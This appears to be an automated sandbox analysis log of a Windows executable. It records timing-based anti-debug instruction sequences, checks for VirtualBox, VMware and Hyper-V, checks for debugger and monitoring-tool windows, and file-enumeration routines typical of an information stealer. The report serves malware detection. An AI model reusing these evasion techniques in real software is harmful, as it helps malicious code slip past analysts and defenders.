                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1B27 second address: AC1B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jc 00007FA3D4D82106h 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1B37 second address: AC1B44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 je 00007FA3D4C68E56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1B44 second address: AC1B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnc 00007FA3D4D82112h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FA3D4D82106h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC223F second address: AC2255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E62h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC2255 second address: AC225F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC2989 second address: AC299C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC299C second address: AC29B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC29B8 second address: AC29EB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4C68E58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FA3D4C68E63h 0x00000014 popad 0x00000015 jno 00007FA3D4C68E5Eh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC29EB second address: AC29F5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA3D4D8210Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC8AA0 second address: AC8AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC8AA6 second address: AC8AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC8BDF second address: AC8C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f jne 00007FA3D4C68E8Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA3D4C68E65h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: ACB080 second address: ACB099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA3D4D82114h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AD8A20 second address: AD8A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AD8A25 second address: AD8A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AD8A2D second address: AD8A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AD8577 second address: AD857C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AD857C second address: AD85DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007FA3D4C68E5Fh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FA3D4C68E65h 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007FA3D4C68E5Ah 0x00000025 jno 00007FA3D4C68E56h 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 jmp 00007FA3D4C68E5Eh 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: ADCA34 second address: ADCA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FA3D4D8210Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: ADCA45 second address: ADCA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E68h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AE146C second address: AE1472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AEB47B second address: AEB4B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Fh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007FA3D4C68E56h 0x00000012 jmp 00007FA3D4C68E68h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AEF408 second address: AEF412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF446D second address: AF4471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF4471 second address: AF4481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3D4D8210Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF4481 second address: AF44B5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA3D4C68E5Eh 0x00000008 jmp 00007FA3D4C68E5Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FA3D4C68E5Bh 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF4737 second address: AF474C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA3D4D8210Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF474C second address: AF4770 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA3D4C68E6Ah 0x00000008 jne 00007FA3D4C68E56h 0x0000000e jmp 00007FA3D4C68E5Eh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF4770 second address: AF4784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA3D4D82106h 0x0000000a js 00007FA3D4D82106h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF4784 second address: AF478A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF4918 second address: AF491D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF491D second address: AF4923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF94B5 second address: AF94BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF922E second address: AF9232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF9232 second address: AF923A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B0BB9A second address: B0BB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B18EC1 second address: B18ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA3D4D82106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B1AA69 second address: B1AA6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B1AA6D second address: B1AA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B1DEB5 second address: B1DEBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B1DCED second address: B1DCF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B1DCF1 second address: B1DCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: B1DCFF second address: B1DD1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA3D4D82110h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jc 00007FA3D4D82106h 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: B2BB66 second address: B2BB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA3D4C68E56h 0x0000000a popad 0x0000000b jmp 00007FA3D4C68E5Bh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: B2BE1D second address: B2BE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: B2C1CF second address: B2C1D9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA3D4C68E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: B2C1D9 second address: B2C1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA3D4D82108h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA3D4D8210Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: B2C1F6 second address: B2C1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: B3077C second address: B30782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: B30824 second address: B3082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: B30A16 second address: B30A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 or dh, FFFFFF8Fh 0x0000000b push 00000004h 0x0000000d mov dh, F1h 0x0000000f jl 00007FA3D4D8210Ch 0x00000015 push BE6C793Fh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FA3D4D8210Ch 0x00000022 jc 00007FA3D4D82106h 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: B30A4C second address: B30A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: B30CBC second address: B30CCA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: 519021E second address: 5190247 instructions: 0x00000000 rdtsc 0x00000002 call 00007FA3D4C68E5Ah 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007FA3D4C68E5Bh 0x0000000f mov ch, 77h 0x00000011 pop edi 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ax, di 0x0000001a movsx ebx, cx 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: 5190247 second address: 519027C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA3D4D82119h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop esi 0x00000015 mov edi, 5F0F215Ah 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: 51902EC second address: 5190322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA3D4C68E66h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA3D4C68E5Ah 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: 5190322 second address: 5190331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: 5190331 second address: 5190345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov bx, 0806h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: 5190345 second address: 519034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Special instruction interceptor: First address: 8A199E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Special instruction interceptor: First address: 8A1998 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Special instruction interceptor: First address: AD06B7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_006538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00654910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00654570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_006416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00653EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00641160 GetSystemInfo,ExitProcess
                Source: XDPT5mgIBO.exe, XDPT5mgIBO.exe, 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware=
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001434000.00000004.00000020.00020000.00000000.sdmp, XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001406000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | API call chain: ExitProcess graph end node | graph_0-13577
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | API call chain: ExitProcess graph end node | graph_0-13580
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | API call chain: ExitProcess graph end node | graph_0-13599
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | API call chain: ExitProcess graph end node | graph_0-13631
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | API call chain: ExitProcess graph end node | graph_0-13591
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | File opened: SICE
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_006445C0 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00659860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00659750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00657850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: XDPT5mgIBO.exe PID: 5928, type: MEMORYSTR
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00659600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: XDPT5mgIBO.exe, XDPT5mgIBO.exe, 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: (Program Manager
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00657B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00656920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
